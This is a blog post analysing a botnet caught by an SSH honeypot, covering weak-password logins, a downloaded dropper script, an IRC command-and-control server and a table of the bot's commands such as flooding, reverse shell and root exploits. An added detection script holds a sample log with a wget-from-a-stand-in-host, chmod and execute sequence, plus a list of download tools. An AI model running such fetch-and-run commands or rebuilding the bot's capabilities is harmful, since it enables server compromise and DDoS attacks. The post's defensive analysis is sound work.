Inside a botnet - part 1
I have had a couple of virtual private servers up and running for a couple of weeks. After a while an attacker used valid credentials and logged on to my server. He downloaded a couple of programs and scripts and suddenly my server was part of a botnet.
Catching the attacker
To catch an attacker in the act I set up a couple of SSH honeypots around the web. This can be easily done by renting a virtual private server for a couple of bucks, moving the real SSH server off the default port and setting up a fake SSH server on port 22.
Attackers will try default and simple passwords to log on, so I created a couple of fake accounts accepting "123456" and "admin" as passwords. In the first few days a few attackers tried to log in; some were successful but logged off directly after logging on. But guess what, they came back a few days later and immediately downloaded a couple of programs and a script and tried to start these applications on my server. The honeypot denied the execution of the programs, but we do have a copy of them now.
SSH server
SSH is a program used to connect to a remote server. This is done in a secure way (Secure Shell). You need a valid login and password and/or a security certificate to log on. Once you have logged on you usually have full control over the server.
Analyzing the payload
The initial script was downloaded from http:// ██████████.pw/; once started, it downloaded a couple of new programs from http://192.227.███.███/. The programs were compiled for all kinds of different hardware platforms, ranging from WiFi routers to 64-bit Linux servers. The payload consists of two parts: the first part tries to find new vulnerable hosts to connect to, spreading like a virus. The second part connects to the command and control center at 192.227.███.███ on port 6667.
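The chain described above (weak-credential login, download of a script, execution, then an outbound connection to the IRC port) is what a honeypot or host monitor should be able to flag. The following is an added example, not code from this post or from the honeypot used here; the session log format, the `dropper.example` host, the `192.0.2.10` address and the list of download tools are constructed assumptions.

```python
import re
# Constructed sample in the shape an SSH honeypot might record a session:
# weak-credential login, script download, execution, outbound IRC connection.
# Made-up lines, not records from the author's honeypot.
SESSION_LOG = """\
2016-03-01T10:02:11 login user=admin password=admin result=success
2016-03-01T10:02:15 cmd cd /tmp
2016-03-01T10:02:19 cmd wget http://dropper.example/x.sh
2016-03-01T10:02:23 cmd chmod +x x.sh
2016-03-01T10:02:24 cmd ./x.sh
2016-03-01T10:02:30 connect dst=192.0.2.10 port=80
2016-03-01T10:02:41 connect dst=192.0.2.10 port=6667
"""
WEAK_PASSWORDS = {"123456", "admin"}    # passwords the honeypot accepts
IRC_PORTS = {6667}                      # C2 port seen in this post
DOWNLOADERS = ("wget", "curl", "tftp")  # assumption: common fetch tools
LINE_RE = re.compile(r"^(\S+) (login|cmd|connect) (.*)$")

def parse_line(line):
    """Split one record into (timestamp, kind, payload); None if malformed."""
    m = LINE_RE.match(line.strip())
    return m.groups() if m else None

def kv(payload):
    """Turn 'a=1 b=2' into a dict; ignores tokens without '='."""
    return dict(t.split("=", 1) for t in payload.split() if "=" in t)

def assess_session(log_text):
    """Flag which infection stages one session shows and whether they add up."""
    stages = {"weak_login": False, "download": False, "execute": False, "irc_c2": False}
    fetched = set()  # base names of files pulled onto the box
    for _, kind, payload in filter(None, map(parse_line, log_text.splitlines())):
        if kind == "login":
            f = kv(payload)
            if f.get("result") == "success" and f.get("password") in WEAK_PASSWORDS:
                stages["weak_login"] = True
        elif kind == "cmd":
            argv = payload.split()
            if argv and argv[0] in DOWNLOADERS:
                stages["download"] = True
                fetched.update(a.rsplit("/", 1)[-1] for a in argv[1:] if "://" in a)
            elif argv and (argv[0].lstrip("./") in fetched or
                           (argv[0] in ("sh", "bash") and argv[1:] and argv[1] in fetched)):
                stages["execute"] = True  # running what was just downloaded
        elif kind == "connect":
            if int(kv(payload).get("port", 0)) in IRC_PORTS:
                stages["irc_c2"] = True
    stages["infected"] = stages["download"] and stages["execute"] and stages["irc_c2"]
    return stages
```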
Looking through the code of the "bot" it accepts a lot of commands from the remote control center.
| Command | Description |
|---|---|
| socks5 | Installs a SOCKS5 proxy server. If successful, the hacked server can be used as a proxy by anyone on the internet. |
| portscan | Scans for open ports on a given host. |
| sendmail | Sends an e-mail with a fake From field to anyone on the internet from the hacked machine. |
| rootme | Tries several known vulnerabilities to get root access to the server. |
| nmap | Scans a remote host for open ports. |
| back | Connects to another server and starts a shell. The attacker can then execute commands on the hacked server. |
| packetstorm | Reads and prints the headlines from packetstorm.org, an information security news website. |
| udpflood | Sends random UDP packets to a given host. The time to repeat this can be set in seconds. |
| udp | Sends random UDP packets to a given host. The time to repeat this can be set in seconds. |
| httpflood | Connects to and disconnects from a given host. The time to repeat this can be set in seconds. |
| sqlflood | Sends random packets to the local MySQL server. The time to repeat this can be set in seconds. |
Sounds like a lot of fun if you are in the DDoS business. With a couple of hundred hacked servers around the world, all connected to this IRC network, you would be able to take down any website with a simple command.